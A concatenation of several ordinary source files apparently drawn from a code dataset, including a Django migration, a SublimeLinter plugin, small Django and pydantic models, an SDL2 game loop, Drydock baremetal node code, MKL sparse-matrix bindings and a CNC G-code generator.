('labid', models.CharField(default='default_id', max_length=200, unique=True)),
('booked', models.BooleanField(default=False)),
('name', models.CharField(max_length=200, unique=True)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='server',
name='bundle',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='resource_inventory.ResourceBundle'),
),
migrations.AddField(
model_name='server',
name='config',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='resource_inventory.ResourceConfiguration'),
),
migrations.AddField(
model_name='server',
name='interfaces',
field=models.ManyToManyField(to='resource_inventory.Interface'),
),
migrations.AddField(
model_name='server',
name='lab',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.Lab'),
),
migrations.AddField(
model_name='server',
name='profile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.ResourceProfile'),
),
migrations.AddField(
model_name='server',
name='remote_management',
field=models.ForeignKey(default=resource_inventory.models.get_default_remote_info, on_delete=models.SET(resource_inventory.models.get_default_remote_info), to='resource_inventory.RemoteInfo'),
),
migrations.RunPython(populate_servers),
migrations.RemoveField(
model_name='generichost',
name='profile',
),
migrations.RemoveField(
model_name='generichost',
name='resource',
),
migrations.RemoveField(
model_name='genericinterface',
name='connections',
),
migrations.RemoveField(
model_name='genericinterface',
name='host',
),
migrations.RemoveField(
model_name='genericinterface',
name='profile',
),
migrations.RemoveField(
model_name='genericresource',
name='bundle',
),
migrations.RemoveField(
model_name='genericresourcebundle',
name='lab',
),
migrations.RemoveField(
model_name='genericresourcebundle',
name='owner',
),
migrations.RemoveField(
model_name='host',
name='bundle',
),
migrations.RemoveField(
model_name='host',
name='config',
),
migrations.RemoveField(
model_name='host',
name='lab',
),
migrations.RemoveField(
model_name='host',
name='profile',
),
migrations.RemoveField(
model_name='host',
name='remote_management',
),
migrations.RemoveField(
model_name='host',
name='template',
),
migrations.RemoveField(
model_name='hostconfiguration',
name='bundle',
),
migrations.RemoveField(
model_name='hostconfiguration',
name='host',
),
migrations.RemoveField(
model_name='hostconfiguration',
name='image',
),
migrations.RemoveField(
model_name='hostopnfvconfig',
name='host_config',
),
migrations.RemoveField(
model_name='hostopnfvconfig',
name='opnfv_config',
),
migrations.RemoveField(
model_name='hostopnfvconfig',
name='role',
),
migrations.RemoveField(
model_name='hostprofile',
name='labs',
),
migrations.RemoveField(
model_name='interface',
name='host',
),
migrations.RemoveField(
model_name='interface',
name='name',
),
migrations.RemoveField(
model_name='opnfvconfig',
name='bundle',
),
migrations.AddField(
model_name='interface',
name='profile',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.InterfaceProfile'),
preserve_default=False,
),
migrations.AddField(
model_name='interfaceprofile',
name='order',
field=models.IntegerField(default=-1),
),
migrations.AlterField(
model_name='cpuprofile',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cpuprofile', to='resource_inventory.ResourceProfile'),
),
migrations.AlterField(
model_name='diskprofile',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storageprofile', to='resource_inventory.ResourceProfile'),
),
migrations.AlterField(
model_name='image',
name='host_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.ResourceProfile'),
),
migrations.AlterField(
model_name='interfaceprofile',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interfaceprofile', to='resource_inventory.ResourceProfile'),
),
migrations.AlterField(
model_name='network',
name='bundle',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='networks', to='resource_inventory.ResourceTemplate'),
),
migrations.AlterField(
model_name='ramprofile',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ramprofile', to='resource_inventory.ResourceProfile'),
),
migrations.RunPython(clear_resource_bundles),
migrations.AlterField(
model_name='resourcebundle',
name='template',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='resource_inventory.ResourceTemplate'),
),
migrations.DeleteModel(
name='ConfigBundle',
),
migrations.DeleteModel(
name='GenericHost',
),
migrations.DeleteModel(
name='GenericInterface',
),
migrations.DeleteModel(
name='GenericResource',
),
migrations.DeleteModel(
name='GenericResourceBundle',
),
migrations.DeleteModel(
name='HostConfiguration',
),
migrations.DeleteModel(
name='HostOPNFVConfig',
),
migrations.DeleteModel(
name='HostProfile',
),
migrations.DeleteModel(
name='Host',
),
migrations.AddField(
model_name='resourceopnfvconfig',
name='opnfv_config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resource_opnfv_config', to='resource_inventory.OPNFVConfig'),
),
migrations.AddField(
model_name='resourceopnfvconfig',
name='resource_config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resource_opnfv_config', to='resource_inventory.ResourceConfiguration'),
),
migrations.AddField(
model_name='resourceopnfvconfig',
name='role',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resource_opnfv_configs', to='resource_inventory.OPNFVRole'),
),
migrations.AddField(
model_name='resourceconfiguration',
name='image',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='resource_inventory.Image'),
),
migrations.AddField(
model_name='resourceconfiguration',
name='profile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.ResourceProfile'),
),
migrations.AddField(
model_name='resourceconfiguration',
name='template',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='resourceConfigurations', to='resource_inventory.ResourceTemplate'),
),
migrations.AddField(
model_name='interfaceconfiguration',
name='profile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.InterfaceProfile'),
),
migrations.AddField(
model_name='interfaceconfiguration',
name='resource_config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interface_configs', to='resource_inventory.ResourceConfiguration'),
),
migrations.AddField(
model_name='interface',
name='acts_as',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.SET_NULL, to='resource_inventory.InterfaceConfiguration'),
),
migrations.RunPython(create_default_template),
migrations.AddField(
model_name='opnfvconfig',
name='template',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='opnfv_config', to='resource_inventory.ResourceTemplate'),
preserve_default=False,
),
]
|
StarcoderdataPython
|
4916378
|
#
# linter.py
# Linter for SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by roadhump
# Copyright (c) 2014 roadhump
#
# License: MIT
#
"""This module exports the Ember Template Linter plugin class."""
import json
import logging
import os
import re
from SublimeLinter.lint import NodeLinter
logger = logging.getLogger('SublimeLinter.plugin.embertemplatelint')
class EmberTemplateLint(NodeLinter):
"""Provides an interface to the ember template linter executable."""
cmd = 'ember-template-lint ${file}'
missing_config_regex = re.compile(
r'^(.*?)\r?\n\w*(Ember template linter couldn\'t find a configuration file.)',
re.DOTALL
)
regex = (
r'.+?'
r'(?P<line>\d+):(?P<col>\d+)'
r'\s+('
r'(?P<error>error)'
r'|'
        r'(?P<warning>warning)'
r')\s+'
r'(?P<message>.*)'
r'\s+'
r'(?P<ruleId>.*)'
)
line_col_base = (1, 0)
defaults = {
'selector': 'text.html.handlebars'
}
def on_stderr(self, stderr):
# Demote 'annoying' config is missing error to a warning.
if self.missing_config_regex.match(stderr):
logger.warning(stderr)
self.notify_failure()
elif (
'DeprecationWarning' in stderr or
'ExperimentalWarning' in stderr or
'in the next version' in stderr # is that a proper deprecation?
):
logger.warning(stderr)
else:
logger.error(stderr)
self.notify_failure()
def split_match(self, match):
match, line, col, error, warning, message, near = super().split_match(match)
ruleId = match.group("ruleId")
return match, line, col, ruleId if error is not None else error, ruleId if warning is not None else warning, message, None
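# Illustrative note (not part of the original plugin): the regex above is built
# to match report lines of the form
#
#     10:2  error  Non-translated string used  no-bare-strings
#
# yielding line=10, col=2, error='error', message='Non-translated string used'
# and ruleId='no-bare-strings'. The exact console format of ember-template-lint
# may differ between versions, so treat this sample line as an assumption.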
|
StarcoderdataPython
|
1835940
|
<reponame>dmsgago/ree<gh_stars>0
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Empresas(models.Model):
cif = models.CharField(max_length=9, blank=True, primary_key=True)
nombre = models.CharField(max_length=25, blank=True)
def __str__(self):
return self.nombre
class Provincias(models.Model):
codigo = models.CharField(max_length=2, blank=True, primary_key=True)
nombre = models.CharField(max_length=30)
def __str__(self):
return self.nombre
class Centrales(models.Model):
nombre = models.CharField(max_length=25, blank=True, primary_key=True)
codigo_provincia = models.ForeignKey(Provincias, on_delete=models.CASCADE)
cif_empresa = models.ForeignKey(Empresas, on_delete=models.CASCADE)
direccion = models.CharField(max_length=110)
telefono = models.CharField(max_length=9)
def __str__(self):
return self.nombre
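# Minimal usage sketch (not part of the original module; values are
# illustrative and assume migrations for this app have been applied):
#
#   empresa = Empresas.objects.create(cif='A12345678', nombre='Energia SA')
#   provincia = Provincias.objects.create(codigo='28', nombre='Madrid')
#   central = Centrales.objects.create(
#       nombre='Central Norte', codigo_provincia=provincia,
#       cif_empresa=empresa, direccion='Calle Mayor 1', telefono='911234567')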
|
StarcoderdataPython
|
6539106
|
<filename>src/app/models/employee.py
from datetime import datetime
from typing import Optional
from pydantic import BaseModel
class Employee(BaseModel):
id: int
first_name: str
second_name: str
date_of_birth: datetime
gender: bool
email: str
salary: int
position: str
hired_on: datetime
# TODO: add location
reports_to: Optional[int] = None
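if __name__ == "__main__":
    # Minimal usage sketch; every field value below is illustrative only.
    employee = Employee(
        id=1,
        first_name="Ada",
        second_name="Lovelace",
        date_of_birth=datetime(1815, 12, 10),
        gender=False,
        email="ada@example.com",
        salary=100000,
        position="Engineer",
        hired_on=datetime(2020, 1, 1),
    )
    print(employee)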
|
StarcoderdataPython
|
3249066
|
<reponame>xtreme3d/xtreme3d
import time
import ctypes
import sdl2
from keycodes import *
def windowHandle(sdlwnd):
info = sdl2.SDL_SysWMinfo()
sdl2.SDL_GetWindowWMInfo(sdlwnd, ctypes.byref(info))
return info.info.win.window
def textRead(filename):
f = open(filename, 'r')
return f.read()
class Framework:
windowWidth = 640
windowHeight = 480
window = None
keyPressed = [False] * 512
mouseButtonPressed = [False] * 255
mouseX = 0
mouseY = 0
halfWindowWidth = 0
halfWindowHeight = 0
running = True
fixedTimeStep = 1.0 / 60.0
timer = 0
lastTime = 0
def __init__(self, w, h, title):
self.windowWidth = w
self.windowHeight = h
self.windowTitle = title
        self.halfWindowWidth = self.windowWidth // 2   # integer division: SDL expects int coordinates
        self.halfWindowHeight = self.windowHeight // 2
sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO)
self.window = sdl2.SDL_CreateWindow(self.windowTitle,
sdl2.SDL_WINDOWPOS_CENTERED,
sdl2.SDL_WINDOWPOS_CENTERED,
self.windowWidth, self.windowHeight,
sdl2.SDL_WINDOW_SHOWN)
sdl2.SDL_WarpMouseInWindow(self.window, self.halfWindowWidth, self.halfWindowHeight)
sdl2.SDL_ShowCursor(0)
self.start()
def start(self):
pass
def update(self, dt):
pass
def render(self):
pass
def onKeyDown(self, key):
pass
def onKeyUp(self, key):
pass
def onMouseButtonDown(self, button):
pass
def onMouseButtonUp(self, button):
pass
def setMouse(self, x, y):
sdl2.SDL_WarpMouseInWindow(self.window, x, y)
def setMouseToCenter(self):
self.setMouse(self.halfWindowWidth, self.halfWindowHeight)
def run(self):
event = sdl2.SDL_Event()
while self.running:
while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
if event.type == sdl2.SDL_QUIT:
self.running = False
elif event.type == sdl2.SDL_KEYDOWN:
self.keyPressed[event.key.keysym.scancode] = True
self.onKeyDown(event.key.keysym.scancode)
elif event.type == sdl2.SDL_KEYUP:
self.keyPressed[event.key.keysym.scancode] = False
self.onKeyUp(event.key.keysym.scancode)
elif event.type == sdl2.SDL_MOUSEBUTTONDOWN:
self.mouseButtonPressed[event.button.button] = True
self.onMouseButtonDown(event.button.button)
elif event.type == sdl2.SDL_MOUSEBUTTONUP:
self.mouseButtonPressed[event.button.button] = False
self.onMouseButtonUp(event.button.button)
elif event.type == sdl2.SDL_MOUSEMOTION:
self.mouseX = event.motion.x
self.mouseY = event.motion.y
self.currentTime = sdl2.SDL_GetTicks()
elapsedTime = self.currentTime - self.lastTime
self.lastTime = self.currentTime
dt = elapsedTime * 0.001
self.timer += dt
if (self.timer >= self.fixedTimeStep):
self.timer -= self.fixedTimeStep
self.update(self.fixedTimeStep)
self.render()
sdl2.SDL_DestroyWindow(self.window)
sdl2.SDL_Quit()
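# Minimal usage sketch (not part of the original module): subclass Framework
# and override the hooks you need. SDL_SCANCODE_ESCAPE comes from pysdl2; the
# window title must be a bytes object.
#
#   class MyApp(Framework):
#       def update(self, dt):
#           if self.keyPressed[sdl2.SDL_SCANCODE_ESCAPE]:
#               self.running = False
#
#   app = MyApp(640, 480, b'Demo')
#   app.run()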
|
StarcoderdataPython
|
3457509
|
import time
from plyer import notification
if __name__ == "__main__":
while True:
notification.notify(
title = "DRINK WATER !!",
message = "Just a gentle reminder for you - You need to drink water right now.",
app_icon = "Related files/glassicon.ico",
timeout = 5
)
        time.sleep(60*40)  # Repeat the reminder every 40 minutes.
|
StarcoderdataPython
|
369459
|
import django.utils.safestring
from django import template
from django.utils.translation import gettext_lazy as _
register = template.Library()
@register.filter
def copyable(value):
value = str(value)
if '"' in value:
return value
title = str(_("Copy"))
return django.utils.safestring.mark_safe(
f"""
<span data-destination="{value}"
class="copyable-text"
data-toggle="tooltip"
data-placement="top"
title="{title}"
>
{value}
</span>"""
)
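# Intended template usage (a sketch, not part of the original module). The load
# name depends on this file's name under templatetags/, so 'copy_tags' below is
# hypothetical, and the page is assumed to ship JavaScript that reacts to the
# .copyable-text class and data-destination attribute:
#
#   {% load copy_tags %}
#   {{ server.ip_address|copyable }}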
|
StarcoderdataPython
|
8005099
|
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Models for drydock_provisioner
#
"""Drydock model of a baremetal node."""
from defusedxml.ElementTree import fromstring
import logging
from oslo_versionedobjects import fields as ovo_fields
import drydock_provisioner.error as errors
import drydock_provisioner.config as config
import drydock_provisioner.objects as objects
import drydock_provisioner.objects.hostprofile
import drydock_provisioner.objects.base as base
import drydock_provisioner.objects.fields as hd_fields
@base.DrydockObjectRegistry.register
class BaremetalNode(drydock_provisioner.objects.hostprofile.HostProfile):
VERSION = '1.0'
fields = {
'addressing': ovo_fields.ObjectField('IpAddressAssignmentList'),
'boot_mac': ovo_fields.StringField(nullable=True),
}
# A BaremetalNode is really nothing more than a physical
# instantiation of a HostProfile, so they both represent
# the same set of CIs
def __init__(self, **kwargs):
super(BaremetalNode, self).__init__(**kwargs)
self.logicalnames = {}
self.logger = logging.getLogger(
config.config_mgr.conf.logging.global_logger_name)
# Compile the applied version of this model sourcing referenced
# data from the passed site design
def compile_applied_model(self,
site_design,
state_manager,
resolve_aliases=False):
self.logger.debug("Compiling effective node model for %s" % self.name)
self.apply_host_profile(site_design)
self.apply_hardware_profile(site_design)
self.source = hd_fields.ModelSource.Compiled
self.resolve_kernel_params(site_design)
if resolve_aliases:
self.logger.debug(
"Resolving device aliases on node %s" % self.name)
self.apply_logicalnames(site_design, state_manager)
return
def apply_host_profile(self, site_design):
self.apply_inheritance(site_design)
return
# Translate device aliases to physical selectors and copy
# other hardware attributes into this object
def apply_hardware_profile(self, site_design):
if self.hardware_profile is None:
raise ValueError("Hardware profile not set")
hw_profile = site_design.get_hardware_profile(self.hardware_profile)
for i in getattr(self, 'interfaces', []):
for s in i.get_hw_slaves():
selector = hw_profile.resolve_alias("pci", s)
if selector is None:
selector = objects.HardwareDeviceSelector()
selector.selector_type = 'name'
selector.address = s
i.add_selector(selector)
for p in getattr(self, 'partitions', []):
selector = hw_profile.resolve_alias("scsi", p.get_device())
if selector is None:
selector = objects.HardwareDeviceSelector()
selector.selector_type = 'name'
selector.address = p.get_device()
p.set_selector(selector)
return
def get_domain(self, site_design):
"""Return the domain for this node.
The domain for this is the DNS domain of the primary network or local.
:param SiteDesign site_design: A instance containing definitions for the networks
this node is attached to.
"""
try:
pn = site_design.get_network(self.primary_network)
domain = pn.dns_domain or "local"
except errors.DesignError as dex:
self.logger.debug("Primary network not found, use domain 'local'.")
domain = "local"
except AttributeError as aex:
self.logger.debug(
"Primary network does not define a domain, use domain 'local'."
)
domain = "local"
return domain
def get_fqdn(self, site_design):
"""Returns the FQDN for this node.
The FQDN for this node is composed of the node hostname ``self.name`` appended
with the domain name of the primary network if defined. If the primary network
does not define a domain name, the domain is ``local``.
:param site_design: A SiteDesign instance containing definitions for the networks
the node is attached to.
"""
hostname = self.name
domain = self.get_domain(site_design)
return "{}.{}".format(hostname, domain)
def resolve_kernel_params(self, site_design):
"""Check if any kernel parameter values are supported references."""
if not self.hardware_profile:
raise ValueError("Hardware profile not set.")
hwprof = site_design.get_hardware_profile(self.hardware_profile)
if not hwprof:
raise ValueError("Hardware profile not found.")
resolved_params = dict()
for p, v in self.kernel_params.items():
try:
rv = self.get_kernel_param_value(v, hwprof)
resolved_params[p] = rv
except (errors.InvalidParameterReference, errors.CpuSetNotFound,
errors.HugepageConfNotFound) as ex:
resolved_params[p] = v
msg = ("Error resolving parameter reference on node %s: %s" %
(self.name, str(ex)))
self.logger.warning(msg)
self.kernel_params = resolved_params
def get_kernel_param_value(self, value, hwprof):
"""If ``value`` is a reference, resolve it otherwise return ``value``
Support some referential values to extract data from the HardwareProfile
hardwareprofile:cpuset.<setname>
hardwareprofile:hugepages.<confname>.size
hardwareprofile:hugepages.<confname>.count
If ``value`` matches none of the above forms, just return the value as passed.
:param value: the value string as specified in the node definition
:param hwprof: the assigned HardwareProfile for this node
"""
if value.startswith('hardwareprofile:'):
(_, ref) = value.split(':', 1)
if ref:
(ref_type, ref_val) = ref.split('.', 1)
if ref_type == 'cpuset':
return hwprof.get_cpu_set(ref_val)
elif ref_type == 'hugepages':
(conf, field) = ref_val.split('.', 1)
hp_conf = hwprof.get_hugepage_conf(conf)
if field in ['size', 'count']:
return getattr(hp_conf, field)
else:
raise errors.InvalidParameterReference(
"Invalid field %s specified." % field)
else:
raise errors.InvalidParameterReference(
"Invalid configuration %s specified." % ref_type)
else:
return value
else:
return value
def get_kernel_param_string(self):
params = dict(self.kernel_params)
if 'hugepagesz' in params:
if 'hugepages' not in params:
raise errors.InvalidParameterReference(
'must specify both size and count for hugepages')
kp_string = 'hugepagesz=%s hugepages=%s' % (
params.pop('hugepagesz'), params.pop('hugepages'))
else:
kp_string = ''
for k, v in params.items():
if v == 'True':
kp_string = kp_string + " %s" % (k)
else:
kp_string = kp_string + " %s=%s" % (k, v)
return kp_string
def get_applied_interface(self, iface_name):
for i in getattr(self, 'interfaces', []):
if i.get_name() == iface_name:
return i
return None
def get_network_address(self, network_name):
for a in getattr(self, 'addressing', []):
if a.network == network_name:
return a.address
return None
def find_fs_block_device(self, fs_mount=None):
if not fs_mount:
return (None, None)
if self.volume_groups is not None:
for vg in self.volume_groups:
if vg.logical_volumes is not None:
for lv in vg.logical_volumes:
if lv.mountpoint is not None and lv.mountpoint == fs_mount:
return (vg, lv)
if self.storage_devices is not None:
for sd in self.storage_devices:
if sd.partitions is not None:
for p in sd.partitions:
if p.mountpoint is not None and p.mountpoint == fs_mount:
return (sd, p)
return (None, None)
def _apply_logicalname(self, xml_root, alias_name, bus_type, address):
"""Given xml_data, checks for a matching businfo and returns the logicalname
:param xml_root: Parsed ElementTree, it is searched for the logicalname.
:param alias_name: String value of the current device alias, it is returned
if a logicalname is not found.
:param bus_type: String value that is used to find the logicalname.
:param address: String value that is used to find the logicalname.
:return: String value of the logicalname or the alias_name if logicalname is not found.
"""
nodes = xml_root.findall(".//node[businfo='" + bus_type + "@" +
address + "'].logicalname")
if len(nodes) >= 1 and nodes[0].text:
if (len(nodes) > 1):
self.logger.info("Multiple nodes found for businfo=%s@%s" %
(bus_type, address))
for logicalname in reversed(nodes[0].text.split("/")):
self.logger.debug(
"Logicalname build dict: node_name = %s, alias_name = %s, "
"bus_type = %s, address = %s, to logicalname = %s" %
(self.get_name(), alias_name, bus_type, address,
logicalname))
return logicalname
self.logger.debug(
"Logicalname build dict: alias_name = %s, bus_type = %s, address = %s, not found"
% (alias_name, bus_type, address))
return alias_name
def apply_logicalnames(self, site_design, state_manager):
"""Gets the logicalnames for devices from lshw.
:param site_design: SiteDesign object.
:param state_manager: DrydockState object.
:return: Returns sets a dictionary of aliases that map to logicalnames in self.logicalnames.
"""
logicalnames = {}
results = state_manager.get_build_data(
node_name=self.get_name(), latest=True)
xml_data = None
for result in results:
if result.generator == "lshw":
xml_data = result.data_element
break
if xml_data:
xml_root = fromstring(xml_data)
try:
hardware_profile = site_design.get_hardware_profile(
self.hardware_profile)
for device in hardware_profile.devices:
logicalname = self._apply_logicalname(
xml_root, device.alias, device.bus_type,
device.address)
logicalnames[device.alias] = logicalname
except errors.DesignError:
self.logger.exception(
"Failed to load hardware profile while "
"resolving logical names for node %s", self.get_name())
raise
else:
self.logger.info(
"No Build Data found for node_name %s" % (self.get_name()))
self.logicalnames = logicalnames
def get_logicalname(self, alias):
"""Gets the logicalname from self.logicalnames for an alias or returns the alias if not in the dictionary.
"""
if (self.logicalnames and self.logicalnames.get(alias)):
self.logger.debug("Logicalname input = %s with output %s." %
(alias, self.logicalnames[alias]))
return self.logicalnames[alias]
else:
self.logger.debug(
"Logicalname input = %s not in logicalnames dictionary." %
alias)
return alias
def get_node_labels(self):
"""Get node labels.
"""
labels_dict = {}
for k, v in self.owner_data.items():
labels_dict[k] = v
self.logger.debug("node labels data : %s." % str(labels_dict))
# TODO: Generate node labels
return labels_dict
@base.DrydockObjectRegistry.register
class BaremetalNodeList(base.DrydockObjectListBase, base.DrydockObject):
VERSION = '1.0'
fields = {'objects': ovo_fields.ListOfObjectsField('BaremetalNode')}
@base.DrydockObjectRegistry.register
class IpAddressAssignment(base.DrydockObject):
VERSION = '1.0'
fields = {
'type': ovo_fields.StringField(),
'address': ovo_fields.StringField(nullable=True),
'network': ovo_fields.StringField(),
}
def __init__(self, **kwargs):
super(IpAddressAssignment, self).__init__(**kwargs)
# IpAddressAssignment keyed by network
def get_id(self):
return self.network
@base.DrydockObjectRegistry.register
class IpAddressAssignmentList(base.DrydockObjectListBase, base.DrydockObject):
VERSION = '1.0'
fields = {'objects': ovo_fields.ListOfObjectsField('IpAddressAssignment')}
|
StarcoderdataPython
|
256335
|
import sys
from typing import Optional
import dataclasses
from numba.core.types.functions import _ResolutionFailures
import numpy as np
from numba import njit, config
from numba.extending import overload
from numba.core.types import StructRef, intc, float64
from numba.experimental import structref
from csr import CSR
from ._api import * # noqa: F403
from csr.constructors import create_empty
__all__ = [
'mkl_h',
'to_handle',
'from_handle',
'release_handle'
]
@structref.register
class mkl_h_type(StructRef):
"Internal Numba type for MKL handles"
pass
if config.DISABLE_JIT:
@dataclasses.dataclass
class mkl_h:
H: int
nrows: int
ncols: int
csr_ref: Optional[np.ndarray]
else:
class mkl_h(structref.StructRefProxy):
"""
Type for MKL handles. Opaque, do not use directly.
"""
structref.define_proxy(mkl_h, mkl_h_type, ['H', 'nrows', 'ncols', 'csr_ref'])
def _make_handle_impl(csr):
"Make a handle from a known-constructable CSR"
_sp = ffi.from_buffer(csr.rowptrs)
_cols = ffi.from_buffer(csr.colinds)
vs = csr.values
assert vs.size == csr.nnz
_vals = ffi.from_buffer(vs)
h = lk_mkl_spcreate(csr.nrows, csr.ncols, _sp, _cols, _vals)
lk_mkl_spopt(h)
return mkl_h(h, csr.nrows, csr.ncols, csr)
_make_handle = njit(_make_handle_impl)
def to_handle(csr: CSR) -> mkl_h:
if csr.nnz == 0:
# empty matrices don't really work
return mkl_h(0, csr.nrows, csr.ncols, None)
norm = csr._normalize(np.float64, np.intc)
return _make_handle(norm)
@overload(to_handle)
def to_handle_jit(csr):
if csr.ptr_type.dtype != intc:
raise TypeError('MKL requires intc row pointers')
if csr.has_values:
vt = csr.val_type.dtype
else:
vt = None
def mkh(csr):
vs = csr._required_values().astype(np.float64)
csr2 = CSR(csr.nrows, csr.ncols, csr.nnz, csr.rowptrs, csr.colinds, vs)
if csr.nnz == 0:
return mkl_h(0, csr.nrows, csr.ncols, csr2)
return _make_handle(csr2)
return mkh
@njit
def from_handle(h: mkl_h) -> CSR:
if not h.H:
return create_empty(h.nrows, h.ncols)
rvp = lk_mkl_spexport_p(h.H)
if rvp is None:
return None
nrows = lk_mkl_spe_nrows(rvp)
ncols = lk_mkl_spe_ncols(rvp)
sp = lk_mkl_spe_row_sp(rvp)
ep = lk_mkl_spe_row_ep(rvp)
cis = lk_mkl_spe_colinds(rvp)
vs = lk_mkl_spe_values(rvp)
rowptrs = np.zeros(nrows + 1, dtype=np.intc)
nnz = 0
for i in range(nrows):
nnz += ep[i] - sp[i]
rowptrs[i + 1] = nnz
assert nnz == ep[nrows - 1]
colinds = np.zeros(nnz, dtype=np.intc)
values = np.zeros(nnz)
for i in range(nrows):
rs = rowptrs[i]
re = rowptrs[i + 1]
ss = sp[i]
for j in range(re - rs):
colinds[rs + j] = cis[ss + j]
values[rs + j] = vs[ss + j]
lk_mkl_spe_free(rvp)
return CSR(nrows, ncols, nnz, rowptrs, colinds, values)
@njit
def order_columns(h):
"""
Sort matrix rows in increasing column order.
"""
if h.H:
lk_mkl_sporder(h.H)
@njit
def release_handle(h: mkl_h):
if h.H:
lk_mkl_spfree(h.H)
h.H = 0
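# Minimal round-trip sketch (not part of the original module). It reuses the
# CSR constructor signature seen above and assumes MKL and its cffi bindings
# are available at runtime; all numbers are illustrative.
#
#   rowptrs = np.array([0, 2, 3], dtype=np.intc)
#   colinds = np.array([0, 2, 1], dtype=np.intc)
#   values = np.array([1.0, 2.0, 3.0])
#   mat = CSR(2, 3, 3, rowptrs, colinds, values)
#   h = to_handle(mat)
#   order_columns(h)          # optional: sort columns within each row
#   back = from_handle(h)     # copies the data back into a new CSR
#   release_handle(h)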
|
StarcoderdataPython
|
5030360
|
<filename>test.py
import json
import os
def read_json():
with open('data.json', encoding='utf-8') as read_file:
data = json.load(read_file)
return data
def g_line(n, line):
tmp = "N{0} {1}\n".format(str(n).zfill(2), line)
return tmp
def get_points(fl, fw, fm):
# --> crutch :)
fm2 = fm
if fw == 140:
if fm == 61 : fm2 = 35
if fm == 70 : fm2 = 44
# <--
points = []
points.append((fm2, fm))
points.append((fm2, fl-fm))
points.append((fw-fm2, fl-fm))
points.append((fw-fm2, fm))
points.append((fm2, fm))
return points
def make_gcode(fasad, freza):
DEFAULT_Z = 16.000
PREPARE_Z = 1.000
PAUSE1 = 4000
PAUSE2 = 10000
flength = fasad[0]
fwidth = fasad[1]
fmargin = freza['отступ']
points = get_points(flength, fwidth, fmargin)
gcode = 'G00 G90 Z{} \n'.format(DEFAULT_Z)
gcode += 'G00 X{} Y{} S{} M03 \n'.format(points[0][0], points[0][1], freza['шпиндель'])
gcode += 'G00 Z{} \n'.format(PREPARE_Z)
gcode += 'G04 P{} \n'.format(PAUSE1)
for depth in freza['глубина']:
for point in points:
gcode += 'G01 X{} Y{} Z-{} F{} S{} \n'.format(point[0], point[1], depth, freza['подача'], freza['шпиндель'])
gcode += 'G00 Z{} \n'.format(DEFAULT_Z)
gcode += 'M05 \n'
gcode += 'G00 X0.0000 Y0.0000 \n'
gcode += 'G04 P{} \n'.format(PAUSE2)
gcode += 'M02 \n'
return gcode
def num_gcode(gcode):
n = 0
tmp = ""
for line in gcode.split('\n'):
if len(line) > 0:
n += 1
tmp += "N{:02} {}\n".format(n, line)
return tmp
def make_nc_file(foldername, fasad, freza):
gcode = make_gcode(fasad, freza)
gcode = num_gcode(gcode)
if not os.path.exists(foldername):
os.makedirs(foldername)
filename = foldername + "/" + "{0}x{1}_{2}.nc".format(fasad[0], fasad[1], freza['имя'])
print(filename)
print(gcode)
f = open(filename, 'w')
f.write(gcode)
f.close()
def make_gcode_file(data):
for freza in data['фрезы']:
foldername = "{}/{}".format(data['папка'], freza['отступ'])
for fasad in data['фасады']:
make_nc_file(foldername, fasad, freza)
def main():
json_data = read_json()
make_gcode_file(json_data)
if __name__ == "__main__":
main()
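# Expected shape of data.json, reconstructed from the keys used above; every
# number below is illustrative only:
#
#   {
#       "папка": "gcode",
#       "фасады": [[716, 396], [916, 140]],
#       "фрезы": [
#           {"имя": "V90", "отступ": 45, "шпиндель": 18000,
#            "подача": 2000, "глубина": [2.0, 4.0]}
#       ]
#   }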
|
StarcoderdataPython
|
3254531
|
<filename>membership/test_utils.py
# -*- coding: utf-8 -*-
import logging
from random import Random
# Use predictable random for consistent tests
random = Random()
random.seed(1)
logger = logging.getLogger("membership.test_utils")
from membership.models import Membership, Contact
# We use realistic names in test data so that it is feasible to test
# duplicate member detection code locally without using production data.
# Finnish population register center's most popular first names for year 2009
first_names = [
"Maria", "Juhani", "Aino", "Veeti", "Emilia", "Johannes", "Venla",
"Eetu", "Sofia", "Mikael", "Emma", "Onni", "Olivia", "Matias",
"Ella", "Aleksi", "Aino", "Olavi", "Sofia", "Leevi", "Amanda",
"Onni", "Aada", "Elias", "Matilda", "Ilmari", "Sara", "Lauri",
"Helmi", "Oskari", "Iida", "Joona", "Aurora", "Elias", "Anni",
